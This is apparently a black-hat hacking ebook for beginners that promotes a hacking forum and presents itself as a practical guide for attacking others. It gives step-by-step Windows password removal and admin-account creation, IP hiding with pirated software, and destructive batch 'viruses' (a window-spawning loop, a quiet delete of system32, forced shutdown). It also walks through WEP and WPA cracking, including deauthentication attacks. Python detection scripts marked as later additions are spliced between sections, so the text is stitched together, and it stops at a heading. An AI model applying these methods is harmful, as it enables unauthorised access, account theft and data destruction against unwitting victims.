
Into The Hacker's Mind

...Keys To The Dark Side...

By CyberGod

Index:
- Introduction
- Chapter 1: Making it clear
  - I - The word "HACKER"
  - II - Different types of hackers
    - a - Black hats
    - b - White hats
    - c - Grey hats
- Chapter 2: The first steps
  - I - Beginners fun
    - a - Windows user passwords
    - b - Getting admin
    - c - Changing IP and VPNs
    - d - Batch virus
  - II - Wifi hacking
    - a - WEP
    - b - WPA/WPA2
  - III - Online accounts hacking
    - a - Phishing
    - b - Keyloggers
    - c - RATs
- Chapter 3: Because "Chapter 2" is too easy! [These chapters will be included in Part 2 of the eBook]
  - I - Website attacks:
    - a - SQL injection
    - b - XSS / cross site scripting
    - c - DOS/DDOS
    - d - Defacing
  - II - Next level: Botnet
  - III - Worms ??
  - IV - Booters
- Chapter 4: Some coding and programming
  - I - Intro
  - II - Stealers
    - a - Builder
    - b - Stub
  - III - Loggers
    - a - Builder
    - b - Stub
  - IV - Crypters
    - a - Builder
    - b - Stub
    - c - Runtime module
- Chapter 5: Pentesting and BackTrack
  - I - Introduction to penetration testing
  - II - Network scanning and information gathering
  - III - Social engineering toolkit and DNS spoofing
  - IV - Metasploit:
    - a - Intro
    - b - Payloads/stager
    - c - Meterpreter
- Chapter 6: Extra: To keep your ass out of trouble
- Chapter 7: From a hacker to another.

Hello and welcome to the hacking world,
this ebook was written by CyberGod to help any new or intermediate hacker. This isn't an informative book nor a hacking dictionary; instead you can consider it like a teacher that will help you through your journey. This means that everything you learn from this book can be applied and used directly, and is not just information about various subjects. Now that you know what you will be reading, I would like to mention that I am not responsible for any action you make based on what you learned from this book. And I would like to thank the whole awesome HF community; if you downloaded this book from somewhere else and you are not a member of HF, I suggest you go and register for an account right now. http://www.hackforums.net

Chapter 1: Making it clear.
I. The word 'Hacker'
You want to be a hacker? OK... but first things first: what does the word 'hacker' refer to? Usually a hacker is a person with great knowledge in informatics and/or electronics, and by great I mean more than an average person. Now when most people hear the word hacker it is associated with evil and bad actions like hacking bank accounts or websites.... But you must know that not all hackers use their knowledge for bad things. A hacker's activities: account hacking, pentesting, programming, RATs/botnets, making money.... and a bunch more. Before ending this small section I would like to say that anyone who wants to be an advanced or expert hacker must learn how to program and code in several languages; for a total newbie I suggest starting with something like HTML or VB.net, these are easy to learn.

II. Different types of hackers
a - Black hats
Black hat hackers are the bad guys, and you must know this is a black hat book. Black hat hackers usually try to hack into all types of accounts, from online banks and PayPal to Facebook and MSN, using different methods like RATs, keyloggers and fake pages. A more advanced black hat hacker will want to write his own crypters and RATs and try to build a huge botnet to take down servers and websites. Black hat hackers are always trying to break any security system or bypass AV and firewalls; some of them also like to use social engineering to trick people into their traps. The causes? Well, I can only think of two main causes: making money, or proving themselves and acquiring forbidden knowledge.

b - White hats
White hats are the opposite of black hats; these guys use their knowledge to help others. They usually code AV and offer help to infected systems; they try to build what black hats destroy. There is not a lot to be told about them, just know that they are the opponents of black hats in an endless war.

c - Grey hats
As you can guess, a grey hat hacker is a mix of a black and a white hat hacker. Usually they want no harm to others but can turn into a black hat to accomplish their goals.

Chapter 2: The first steps
I. Beginners fun
a - Windows user passwords
In this chapter you will learn how to remove any user password on the Windows operating system. I know this may sound noob or too easy for some, but for a beginner this will be an excellent first lesson. Before going directly into action I would like to explain how we are going to remove that password. By the way, I will be showing you 2 methods. First of all you must know that Windows user passwords are stored on the HD, so using a simple bootable program we can have full access to that HD, remove the password and then boot again into Windows; don't worry if you didn't understand a word, because I will explain everything. The second method can be used only with a Windows XP operating system: what you actually do is log in to the hidden unprotected user "administrator" and remove the passwords of the other users from there.

1.
Enough talking, let's get to action. I will explain the second method first. Assuming you're on the login screen and you're asked for the password, all you have to do is press ctrl+alt+del, then, keeping ctrl and alt pressed, release the del button and press it again. You should be presented with a login form where you can enter a user and a password; in the user field write "administrator" without quotes and leave the password field blank. Now you should be able to log in to the administrator user. Once there you can remove any other user's password without knowing the old one. Finally you should know that the administrator user can be protected by a password, in which case this method won't work anymore; but by default it comes with no password and most people don't know about that user, so 99% of the time it will be unprotected.

2.

Now for the other method. You will need a blank CD or DVD, a CD/DVD drive and burning software; I am going to be using Nero but you can use any other burning software. In Nero choose "burn image" and select the "password reset.iso" provided in the "Files" folder. Insert a blank CD and click burn; you should end up with a bootable CD. I want to mention that we can also use a USB stick instead of a CD, just follow the instructions provided in the "README.txt" inside the ISO image. The next step would be to boot from the CD/DVD/USB; for that you have to insert your CD/DVD/USB, restart your computer, and follow the instructions below: When the computer is starting you will get a message similar to "press F1 to enter BIOS setup". F1 isn't the standard key for all BIOSes, it varies from one to another. To enter the setup simply press the correct key. Now in the BIOS go to the "Startup" or "Boot" tab and change the boot order: if you're booting from a CD or DVD put the CD/DVD drive at position 1; if you want to boot from a USB stick then choose the corresponding device and put it at position 1.

In the above picture I chose the DVD device to be #1. Next you need to save and exit. After the setup exits your computer should reboot and it will boot from the CD; press enter and wait for the program to load. The first thing you will be asked is to choose the correct partition; this means if your HDD is divided into several partitions (ex: C:\ and D:\) you need to choose the system partition (the one containing the "Windows" folder and files). In my case it is number "2", so I will just type "2" and hit enter.

Next we want to point the program to the config folder; don't panic, it is usually "Windows/system32/config". You get this option by default, so just press enter without typing anything.

Now choose "Password reset", which is number "1".

Then "Edit user data and passwords".

Now you need to choose the user whose password is to be removed; for that you need to type the whole name of the user, and it is case sensitive (you will be provided with the users list).

Then you will be provided with several useful options; we are going to use option "1", or if you want to change the password and not remove it then choose "2" and hit enter.

You will get the above message "Password cleared!"; now type "!" then press enter. You will be asked: "About to write file(s) back! Do it?" By default it is [n], which means "no" and would undo the changes, so we want to type "y" for yes and press enter; press enter for the next message and you are done. Remove the CD and press ctrl+alt+del to reboot.

After the reboot you will notice that the password was removed. Don't forget to choose your HDD as the boot device in the BIOS after you are done. This is the end of our first lesson.

b - Getting admin
That is actually pretty simple on a Windows machine; you will learn 2 different ways to do it. And if you are asking why I am always targeting Windows machines, the answer would be: because Windows is the most used operating system and the easiest to hack. Now to action.
Method 1: You are going to use CMD, also known as the command prompt. For me this method is useless because you need to be administrator in the first place; all it does is add another administrator user, but it can come in handy some day if the account you're in is monitored or has some restriction, I don't know... Here is what you need to do: open cmd by going to "Run" and typing CMD.exe, or open a notepad and type in:
    cmd
without quotes, and then save it as anything.BAT; it is important to add .bat at the end of the name so it is treated as a batch file. Once in CMD type:
    net localgroup Administrators <username> /add
Replace <username> with the name you want and press enter. Now log out and you should see the new administrator user.
Method 2: For this method you need to do the exact same thing we did with the "Password reset" (see it here) until you are at this stage.

Now you need to choose option 3 "Promote user" and continue the same way we did for removing the password.
The End
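Detecting the local-admin addition of Method 1 above, as an added example that is not part of the original book: a Python triage over Windows Security events, both Event ID 4688 (process creation, which carries the command line only when command-line auditing is enabled) and Event ID 4732 (a member was added to a security-enabled local group). The sample events are constructed; field names follow the Security log's XML event data.

```python
"""Flag additions to the local Administrators group in Windows Security events.

Constructed sample events (not real logs) mimic the event-data fields of
Event ID 4688 (process creation) and Event ID 4732 (member added to a
security-enabled local group).
"""
import re

# Matches the command the page shows, "net localgroup Administrators <user> /add",
# plus the net1.exe alias and a quoted member such as "CORP\svc".
NET_LOCALGROUP_ADD = re.compile(
    r'\bnet1?(?:\.exe)?\s+localgroup\s+"?administrators"?\s+'
    r'(?P<member>"[^"]+"|\S+)\s+/add\b',
    re.IGNORECASE,
)


def detect_local_admin_additions(events):
    """Return one finding per event that adds a member to local Administrators.

    4688 findings come from the command line (they catch the page's method even
    when group-membership auditing is off); 4732 findings are the authoritative
    record of the group change and should fire regardless of the tool used.
    """
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4688:
            match = NET_LOCALGROUP_ADD.search(ev.get("CommandLine", ""))
            if match:
                findings.append({
                    "event_id": 4688,
                    "actor": ev.get("SubjectUserName"),
                    "member": match.group("member").strip('"'),
                    "evidence": ev.get("CommandLine"),
                })
        elif eid == 4732 and ev.get("TargetUserName", "").lower() == "administrators":
            findings.append({
                "event_id": 4732,
                "actor": ev.get("SubjectUserName"),
                "member": ev.get("MemberSid"),   # 4732 usually carries the SID, not the name
                "evidence": "member added to local Administrators",
            })
    return findings


# Constructed events: two real additions (one by the page's exact command, one via
# net1 inside cmd.exe), one group listing that is benign, and one unrelated group.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net localgroup Administrators backdoor /add"},
    {"EventID": 4688, "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net localgroup Administrators"},          # listing only
    {"EventID": 4732, "SubjectUserName": "alice",
     "TargetUserName": "Administrators", "MemberName": "-",
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1105"},
    {"EventID": 4732, "SubjectUserName": "alice",
     "TargetUserName": "Remote Desktop Users", "MemberName": "-",
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1106"},
    {"EventID": 4688, "SubjectUserName": "bob",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c net1 localgroup administrators "CORP\\svc" /add'},
]

if __name__ == "__main__":
    for finding in detect_local_admin_additions(SAMPLE_EVENTS):
        print(finding)
```

Correlating a 4688 hit with a 4732 from the same actor within a few seconds distinguishes a completed change from a failed attempt.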

c - Changing IP address and VPNs
Why would I want to change my IP? And what is a VPN? Well, I will answer your questions right now. If you are going to hack a website or RAT someone you obviously don't want to be tracked, so changing your IP is going to help you a lot. Changing your IP can also help bypass some restrictions like a banned IP. Now for the VPN part: VPN stands for Virtual Private Network. Using a VPN service will create a private encrypted connection between you and the provider; this means that no one can intercept your connection, and if someone traced you back it would lead him to the VPN provider and not to your personal computer. I will talk no longer about VPNs, because it is easy to get one; there are some free VPNs out there but the best ones charge money. Now, how to change your IP: you are going to need a proxy changer program and a proxy list. A proxy is simply an IP + port; you use that port to connect to the IP and use it. I will be using a program called "Proxy Switcher"; it is a paid program but I provided you with a cracked copy, you can find it in "Files" under the name "ProxySwitcher.rar".

Now follow the instructions:
1 - Installing Proxy Switcher: First extract the rar archive and install Proxy Switcher. After the installation is done, right click on the Proxy Switcher icon in the taskbar and click "register proxy switcher"; use any name with the key I provided in key.txt. Now exit Proxy Switcher, launch it again, and you are OK to go.
2 - Finding fresh proxies: Well, this part is more like a Google search; you need to search for "proxy list" or "fresh proxy list", or you can use Proxy Switcher itself to search for proxies for you. Here is how you do that.
a. Using Proxy Switcher: Right click on the taskbar icon > Show Manager

Now click the "Common task wizard"

Click "Next", then choose the first option in the common tasks and click finish.

Then wait for the program to get the proxies and scan them, and you will have a list of dead and working proxies; now double click on any working one and you are good to go. Note: Sometimes your internet connection may get slower, depending on the speed of the proxy server. And you won't always find proxies using Proxy Switcher, so I prefer searching in Google.
b. Using Google (better): Simply go to Google and search for "fresh proxy list", get any list that you think is fresh, then copy it to a notepad and save it. Now go to Proxy Switcher > File > Import from text file... and choose the txt file you saved the list in.

Now click on new and you should have a list of unchecked proxies.

Click on "Test proxy servers for availability" and wait for the scan.

Now you should get working and dead proxies. Choose one of the working proxies and connect to it, then go see if your IP has changed. Here is a trick: if you get no working proxy you can choose a dead one with a relatively small ping/response and connect to it, and it should work. Here is a picture to make things clear.

Before I conclude, here is a list of free VPN services:
ProXPN
CyberGhost
Hotspot Shield
GPass
SecurityKiss
and a bunch more...

d - Batch virus
"Batch file is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter.

The commands may be built into the command processor (COPY), supplied with the operating system but not built into it (XCOPY invokes the Microsoft DOS program XCOPY.EXE), or may be any program (cp invokes the program cp.exe if present, an .EXE port of the Unix cp command, with essentially the same functionality as XCOPY.EXE).

Similar to job control language and other systems on mainframe and minicomputer systems, batch files were added to ease the work required for certain regular tasks by allowing the user to set up a script to automate them. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands, normally line by line.[1] Unix-like operating systems (such as Linux) have a similar type of file called a shell script.[2]

The filename extension .bat was used in DOS, and the Windows 9x family of operating systems. The Microsoft Windows NT family of operating systems and OS/2 added .cmd. Batch files for other environments may have different extensions, e.g. .btm in 4DOS and 4NT related shells." Thanks Wikipedia.

Now that you know what a batch file is, I will give a list of some commands with a description, then jump to the part where we use these commands to make simple evil viruses. (Don't be afraid of the list, you don't have to memorise it :P, we will be using only a few of these commands.)

Commands list:

@   In DOS version 3.3 and later, hides the echo of a batch command. Any output generated by the command is echoed. The at sign can be prefixed to any DOS command, program name, or batch file name within a batch file.
    @[command]
    examples
    @                 {Separates sections of the batch file without displaying the DOS prompt.}
    @echo OFF         {Hides the echo off report.}

%DIGIT   Replaceable batch parameters which are defined by the user when the batch is executed. The parameters are separated by spaces, commas, or semicolons.
    %digit            {Digit: any digit from 0 to 9. %0 has the value of the batch command as it appears on the command line when the batch is executed. %1 represents the first string typed after the batch command. Each occurrence of %digit is replaced by the corresponding string from the batch command line.}
    examples
    MYBATCH DOC A:    {Copies all .DOC files in the default directory to drive A:}
    COPY *.%1 %2

%VARIABLE%   Replaces the DOS environment variable name with its environment value.
    %variable%        {Variable: a string of uppercase characters in the environment associated with a string value. Variable is created in the environment by using SET.}
    examples
    %PATH%            {Returns the value of PATH, the current search path, which is executable.}
    echo %PATH%       {Displays the value of PATH, the current search path.}
    %PROMPT%          {Returns the value of PROMPT, the current prompt string, which is executable.}
    echo %PROMPT%     {Displays the value of PROMPT, the current prompt string.}
    echo The current search path is: %PATH%   {Displays the message including the current search path.}
    set USER=John
    if %USER%==John goto LABEL   {Since the value of USER does equal "John", control is transferred to the label, LABEL.}

CALL   Loads and executes a batch file from within a batch file as if it were an external command. When the second batch file completes, control is returned to the calling file.
    call [drive:][path]filename [batch parameters]
    Before DOS version 3.3:
    command /c [drive:][path]filename [batch parameters]

CLS   Clears the video display screen, setting the cursor in the upper left-hand corner.
    cls

ECHO   Controls whether commands and comments within a batch file are displayed.
    echo [ON|OFF|message|.]
    examples
    echo              {Displays echo status}
    echo ON           {Restores normal display activity.}
    echo OFF          {Halts display of DOS prompt and commands.}
    echo Processing...   {Displays "Processing..." on the screen.}
    echo %USER%       {Displays the value of USER on the screen.}
    echo.             {Displays a single blank line on the screen.}
    echo ^L > prn     {Sends an ASCII control code (form feed) to the printer. Press <Ctrl> plus <L> to type the ^L character.}
    echo Y | Del *.*  {Answers the DEL "Are you sure" question automatically.}

FOR   Repeats the operation of a DOS command for each member of a list. Use CALL to execute a batch file as a command.
    for %%argument in (list) do command   {Argument: any letter from A to Z. List: a sequence of strings separated by spaces or commas. Wildcards are allowed.}
    examples
    for %%d in (A,C,D) do DIR %%d*.*   {Displays the directories of drives A, C, and D sequentially.}
    for %%f in (*.TXT *.BAT *.DOC) do TYPE %%f   {Types the contents of all .TXT, .BAT, and .DOC files in the current default directory.}
    for %%P in (%PATH%) do if exist %%P\*.BAT COPY %%P\*.BAT C:\BAT   {Copies all batch files which exist in any directory on the DOS command search path into the directory C:\BAT.}
    for %%f in (*.PAS) do call compile %%f   {Compiles all .PAS files in the current default directory.}

GOTO   Transfers control within a batch file to a line identified by a label. The label must be of the form ":LABEL".
    goto LABEL
    :LABEL

IF   Tests a condition and executes a command only if the condition is TRUE. But if the NOT modifier is present, the command will be executed only if the condition is FALSE.
    if [not] condition command   {Condition: errorlevel number; string1==string2; or exist filename. Command: any DOS command, batch command, batch file name, or program name.}
    examples
    if [not] errorlevel number command   {Errorlevel: an exit code returned by a program or an external command. The following DOS commands return an exit code: BACKUP, RESTORE, FORMAT, REPLACE, and XCOPY. Number: a numerical value (integer) against which the exit code is compared. The condition is TRUE if the exit code returned by the previous program is greater than or equal to number. The condition is FALSE if the exit code is less than number.}
    BACKUP C:\*.* A: /s
    if errorlevel 3 goto TROUBLE   {If the BACKUP command exits with a code of 3 or higher, control will be transferred to the label TROUBLE.}
    if errorlevel 3 if not errorlevel 4 echo ERROR #3 occurred
    if errorlevel 4 if not errorlevel 5 echo ERROR #4 occurred   {Nested if statements that determine the exact error number.}
    if [not] string1==string2 command   {The condition is TRUE if both strings are identical. The comparison is case sensitive. If either string is blank, a syntax error occurs.}
    if (%1)==(LTRS) CD C:\WORD\LTRS   {If the first parameter is LTRS, then change directory to LTRS.}
    if "%1"=="" goto ERROR   {If there is no parameter, then control is transferred to label ERROR.}
    if not %2X==X DIR %2\*.*   {If there is a second parameter, then display all the files contained in the directory %2.}
    if not "%3"=="" if not "%3"=="b" if not "%3"=="B" goto BADPARAM   {If there is no third parameter, or if it is anything other than b or B, then go to label BADPARAM.}
    if [not] exist filename command   {The condition is TRUE if filename can be located. The filename can include drive and path specifications. Wildcards are allowed.}
    if exist D:\%1\nul CD %1   {Tests for the existence of directory %1 even if it contains no files, then changes to that directory if it exists.}
    if not exist A:\FLASH.EXE COPY C:\PROJECTS\FLASH.EXE A:   {Copies FLASH.EXE to drive A, but only if it doesn't exist there already.}

PAUSE   Pauses the running of a batch file and displays the message "Press any key to continue..." on the screen. If the optional message is included, it will be displayed first. Use pause to optionally terminate the batch file with <Ctrl-Break> at a safe place. The optional message is not displayed when echo is OFF, so the message must be echoed on the preceding line.
    pause [message]
    examples
    pause             {Displays "Press any key to continue...".}
    pause < nul       {Waits with no comment.}
    pause Do you want to continue?   {Displays "Do you want to continue?" with "Press any key to continue..." on the next line.}

REM   Adds remarks to a batch file.
    rem [remark]
    examples
    @rem              {Hides the remark from display.}

SET   Set will view the DOS environment or create, change, or delete environment values.
    set [variable=[value]]   {Variable: a string of characters, unbroken by spaces, which are converted to uppercase letters in the environment. Value: a string of characters, case specific, associated with variable.}
    examples
    set               {Display the entire DOS environment.}
    set USER=John     {Sets the value of USER to the string "John".}
    set USER=         {Removes USER from the environment.}
    set PATH=C:\;C:\DOS   {Sets C:\;C:\DOS as the current search path.}
    set PATH=%PATH%;C:\TEST   {Appends ;C:\TEST to the current search path.}

SHIFT   Shifts any parameter on the command line one position to the left. Use SHIFT to refer to multiple parameters by one name, or to use more than ten parameters on a single command line.
    shift
    examples
    :LOOP
    COPY %1 A:
    shift
    if not (%1)==() goto LOOP   {Beginning with the first parameter, all the parameters listed on the command line are iterated and a file, the value of the parameter, is copied to A:.}

Miscellaneous
    command > nul     {Redirects command output to oblivion.}
    command > file    {Redirects command output to file.}
    command >> file   {Appends command output to file.}
    command < file    {Redirects file output to command.}
    PATH              {Displays "PATH=" followed by the value of PATH, the current search path.}
    PATH directories  {Sets directories as the current search path.}
    PATH=directories  {Sets directories as the current search path.}
    PATH;             {Disables extended command searching and confines the searching to the default directory.}
    PROMPT            {Resets the prompt string to its default, $n$g.}
    CD                {Displays the current directory and its path.}
    .                 {Represents the default directory (If PATH=D:\;C:\SYS;C:. then the current directory will be searched after D: and C:\SYS).}
    ..                {Represents the parent of the default directory (C:\TOOLS\WP\LTRS.DOC is the same as ..\WP\LTRS.DOC).}
    %%                {A literal "%".}

End of list

Now to the cool part. I will show you several batch files that can be used to harm someone's PC or just to prank someone. For all the following examples you need to type the code in a notepad and save it as "something.BAT"; adding ".BAT" at the end is a must, so it saves the file as batch.
1 - Open endless windows:
    @echo off
    start file.bat
    goto file.bat
How the code works: "file.bat" is the name of your batch file, you can change it if you want.
"start file.bat": opens file.bat
"goto file.bat": goes to the previous line and opens another window. So this is an endless loop of opening windows, and the best part is that every new window will start opening new windows also. This can crash an old weak computer.
2 - Delete file or folder
    @echo off
    del /q "c:\windows\system32"
These two lines may appear pretty simple but can have a devastating effect on a Windows operating system. We are simply using the "del" command to delete a specific folder's contents, in this case the "system32" folder. The tricky part is the "/q" after "del": adding this will delete the files without asking the user for confirmation.
3 - Shutdown computer
    Usage: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]
    No args            Display this message (same as -?)
    -i                 Display GUI interface, must be the first option
    -l                 Log off (cannot be used with -m option)
    -s                 Shutdown the computer
    -r                 Shutdown and restart the computer
    -a                 Abort a system shutdown
    -m \\computername  Remote computer to shutdown/restart/abort
    -t xx              Set timeout for shutdown to xx seconds
    -c "comment"       Shutdown comment (maximum of 127 characters)
    -f                 Forces running applications to close without warning
    -d [u][p]:xx:yy    The reason code for the shutdown
                       u is the user code
                       p is a planned shutdown code
                       xx is the major reason code (positive integer less than 256)
                       yy is the minor reason code (positive integer less than 65536)
Very clear, no need to explain anything.

Conclusion: Using cmd commands you can pretty much do any task in Windows; the above examples just show you how to play with built-in commands to achieve your own goals...
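Static triage of batch files for the three destructive shapes shown above (self-starting window loop, quiet delete under the Windows directory, forced shutdown, plus the auto-confirmed "echo Y | del" from the command list), as an added example that is not part of the original book. The sample scripts are constructed inline; the first two reproduce the page's own examples, the last is a benign backup script that also uses "del /q" and must not be flagged. These are signatures for these shapes only, not a general malware detector.

```python
"""Triage Windows batch files for the destructive patterns shown on the page."""
import re

# Paths that mark the Windows installation; matched case-insensitively.
SYSTEM_DIR = r"(?:%systemroot%|%windir%|[a-z]:\\windows\b)"

# Per-line rules: (name, regex). Lookaheads let the switch and the path appear in
# any order ("del /q C:\windows\..." or "rd C:\Windows /s /q").
LINE_RULES = [
    ("quiet delete under Windows directory",
     re.compile(r"^\s*(?:del|erase|rd|rmdir)\b(?=.*\s/[qs]\b)(?=.*" + SYSTEM_DIR + ")",
                re.IGNORECASE)),
    ("forced shutdown / restart / logoff",
     re.compile(r"^\s*shutdown(?:\.exe)?\b(?=.*\s[-/][srl]\b)", re.IGNORECASE)),
    ("auto-confirmed wildcard delete",
     re.compile(r"echo\s+y\s*\|\s*(?:del|erase)\b", re.IGNORECASE)),
]

# "start" with an optional window title and switches, capturing what it launches.
START_CMD = re.compile(
    r'^\s*(?:call\s+)?start\b(?:\s+"[^"]*")?(?:\s+/\w+)*\s+(?P<target>"[^"]+"|\S+)',
    re.IGNORECASE)
# %0 and its ~ modifiers expand to the running script itself (see %DIGIT above).
SELF_REFS = {"%0", "%~f0", "%~nx0", "%~dpnx0"}


def starts_itself(line, own_name):
    """True when a start command launches the batch file that contains it."""
    match = START_CMD.match(line)
    if not match:
        return False
    target = match.group("target").strip('"').lower()
    own = own_name.lower()
    return target in SELF_REFS or target == own or target.endswith("\\" + own)


def scan_batch(text, own_name="script.bat"):
    """Return [(line_no, rule_name, stripped_line)] for every suspicious line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if starts_itself(line, own_name):
            findings.append((line_no, "self-starting loop (window bomb)", line.strip()))
        for name, rule in LINE_RULES:
            if rule.search(line):
                findings.append((line_no, name, line.strip()))
    return findings


def triage(samples):
    """Scan a {filename: contents} mapping; the filename feeds the self-start check."""
    return {name: scan_batch(text, own_name=name) for name, text in samples.items()}


# Constructed samples; the first two are the page's own examples verbatim.
SAMPLES = {
    "file.bat": "@echo off\nstart file.bat\ngoto file.bat\n",
    "wipe.bat": "@echo off\ndel /q \"c:\\windows\\system32\"\n",
    "off.bat": "@echo off\nshutdown -s -t 10 -c \"bye\"\n",
    "backup.bat": ("@echo off\n"
                   "if not exist D:\\backup\\nul mkdir D:\\backup\n"
                   "copy C:\\docs\\*.doc D:\\backup\n"
                   "del /q D:\\backup\\old.tmp\n"),   # quiet delete, but not a system path
}

if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        print(name, "->", hits or "clean")
```

The "goto" line of the window loop is harmless on its own; the loop is caught at the "start" line that re-launches the script, which is also how the %0 variant is caught.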

II. Wifi Hacking
In this section I will show you how to crack two different types of wifi encryption, WEP and WPA/WPA2. In both sections we will be using BackTrack 5 R2, so if you don't have it go download it now, it is free from the official site; I use KDE 32 bit but any other version of BT5 will do. For those who don't know what BackTrack is: "BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking." Here is the official website: http://www.backtrack-linux.org/
Download BackTrack, burn it to a DVD and boot. Once you're in, type "startx" to change from text login to graphical login.
Black screen fix:
1) Insert the live DVD
2) In GRUB (when asked to choose a boot option) press TAB to edit the boot entry
3) You will see something like this:
    file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.gz
Add "xforcevesa noapic noapci nosplash irqpoll" after initrd.gz. This should fix the problem.

WEP
WEP is relatively easy to crack, especially with BT5 and "Gerix wifi cracker". One more thing: if you want to experiment with all the aircrack features you will need a compatible wireless card; I suggest Alfa Network wireless adapters. First we need to open Gerix wifi cracker: "Backtrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng"

Next go to the "Configuration" tab, select your wireless card interface, usually "wlan0" or "wlan1", and click "Enable/Disable Monitor Mode".

A new interface should appear under the name "mon0" with "Monitor" as its Mode. If that doesn't happen, or if the Mode isn't "Monitor", then probably your wireless card isn't compatible. Anyway, let's move on: now select the new monitor interface and click "Rescan networks". You will get a list of all wireless networks near you; Essid is the name of the network and Bssid is the MAC address. You will also need to check the "Enc" (encryption) column: for this part the network should have "WEP" encryption. Select a compatible network and move to the "WEP" tab.

First we need to collect some packets; go to the "General functionalities" section and click "Start Sniffing and Logging".

A new terminal will appear, showing the packet capture and all the clients connected to the attacked access point (router). The number under "#Data" shows how many packets we have captured, and the MAC addresses under "Station" refer to the clients connected to the AP; in my case there is only one device connected, with the MAC address "7C:11:BE:91:FF:E6" (I can tell it is an iPhone from the MAC address).

The more devices using the AP, the faster we will collect packets; our goal is above 10000 packets. Now for the attacks: in my case I am using an Intel wireless card, so the attacks won't have a big effect, but I will show you how to do them. I will go with "WEP Attacks (no client)" because this will work even if there is no device connected to the wireless network. We have two types of attacks in the no-client section, ChopChop and fragmentation; here is a list of pros and cons:

Fragmentation
Pros
- Can obtain the full packet length of 1500 bits xor. This means you can subsequently pretty well create any size of packet.
- May work where chopchop does not.
- Is extremely fast. It yields the xor stream extremely quickly when successful.
Cons
- Needs more information to launch it, i.e. IP address info. Quite often this can be guessed. Better still, aireplay-ng assumes source and destination IPs of 255.255.255.255 if nothing is specified. This will work successfully on most APs. So this is a limited con.
- Setup to execute the attack is more subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.

Chopchop
Pros
- May work where frag does not work.
- You don't need to know any IP information.
Cons
- Cannot be used against every access point.
- The maximum xor bits is limited to the length of the packet you chopchop against.
- Much slower than the fragmentation attack.

I will start with the chopchop attack: first click "Start false access point Authentication on victim".

Then "Start ChopChop attack"; type "y" for yes in the new window and press enter. Wait some seconds, then press "Create the ARP packet to be injected on the victim access point".

Finally, "Inject the created packet on victim access point". Follow the same steps for the fragmentation attack, they are very similar. Now we wait until we get more than 10000-15000 packets.

Then go to "Cracking" > "WEP cracking" and click "Aircrack-ng - Decrypt WEP password"; wait for it to finish and you will get your password. Remove the ":" from it, so in my case it will be "2400242890".

WPA/WPA2
This attack needs at least one client connected to the AP. Same as WEP until you choose a network to crack; for this you need the network to have WPA or WPA2 encryption. Select it, then go to the "WPA" tab.

Now "Start Sniffing and Logging".

Now we need to get a "Handshake" so we can brute force the password; to do that open "WPA attacks" then click "autoload victim clients".

Now click "client deauthentication", wait for it to finish and you will get "WPA handshake: AP BSSID" (if not, try increasing the deauth number, it is 4 by default).

> Waiting for client deauthentication.

After we get a handshake we are ready to start cracking, so first we need to get a dictionary file; it is basically a very big list of passwords, you can find one easily if you google it. I will assume you got your dictionary file; now go to "Cracking" > "WPA bruteforce cracking". In normal cracking type the location of your dictionary file (including the file's name) and click "Aircrack-ng - Crack WPA password".

Almost done: if your dictionary contains the password, aircrack should be able to recover it.

This concludes the second section of chapter 2.
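Detecting the deauthentication burst that the "client deauthentication" step above depends on, as an added example that is not part of the original book. Frames are constructed inline in a simplified (timestamp, subtype, bssid, destination) shape instead of being read from a monitor-mode capture, and the BSSID and client MACs are made up. On the AP side the fix is Protected Management Frames (802.11w), which stop clients honouring forged deauths; this block is the monitoring side.

```python
"""Alert on 802.11 deauth/disassoc bursts per BSSID using a sliding time window."""
from collections import defaultdict, deque

DEAUTH_SUBTYPES = {"deauth", "disassoc"}
BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_bursts(frames, window_s=5.0, threshold=8):
    """Return one alert per BSSID that sees >= threshold deauth/disassoc frames
    inside any window_s-second window.

    A few deauths per hour is normal roaming; dozens within seconds is an
    injection tool kicking clients so they reconnect and expose the handshake.
    frames: iterable of (timestamp_s, subtype, bssid, dst) tuples.
    """
    recent = defaultdict(deque)          # bssid -> (ts, dst) frames still in window
    alerts, alerted = [], set()
    for ts, subtype, bssid, dst in sorted(frames):
        if subtype not in DEAUTH_SUBTYPES:
            continue
        window = recent[bssid]
        window.append((ts, dst))
        while ts - window[0][0] > window_s:   # expire frames that left the window
            window.popleft()
        if len(window) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({
                "bssid": bssid,
                "count": len(window),
                "first": window[0][0],
                "last": ts,
                # a deauth addressed to every client at once is a strong tell
                "broadcast": any(d == BROADCAST for _, d in window),
            })
    return alerts


# Constructed addresses and traffic; nothing here comes from a real capture.
ATTACKED_AP = "00:11:22:33:44:55"
QUIET_AP = "66:77:88:99:aa:bb"
CLIENT = "aa:bb:cc:dd:ee:01"

SAMPLE_FRAMES = (
    # quiet AP: ordinary data plus two legitimate deauths a long way apart
    [(0.0, "deauth", QUIET_AP, CLIENT), (50.0, "deauth", QUIET_AP, CLIENT)]
    + [(float(t), "data", QUIET_AP, CLIENT) for t in range(1, 60, 5)]
    # attacked AP: twelve deauths in about 2.4 s, alternating broadcast and client
    + [(10.0 + 0.2 * i, "deauth", ATTACKED_AP, BROADCAST if i % 2 == 0 else CLIENT)
       for i in range(12)]
)

if __name__ == "__main__":
    for alert in detect_deauth_bursts(SAMPLE_FRAMES):
        print(alert)
```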

III. Online accounts (Facebook, Hotmail, Gmail...)
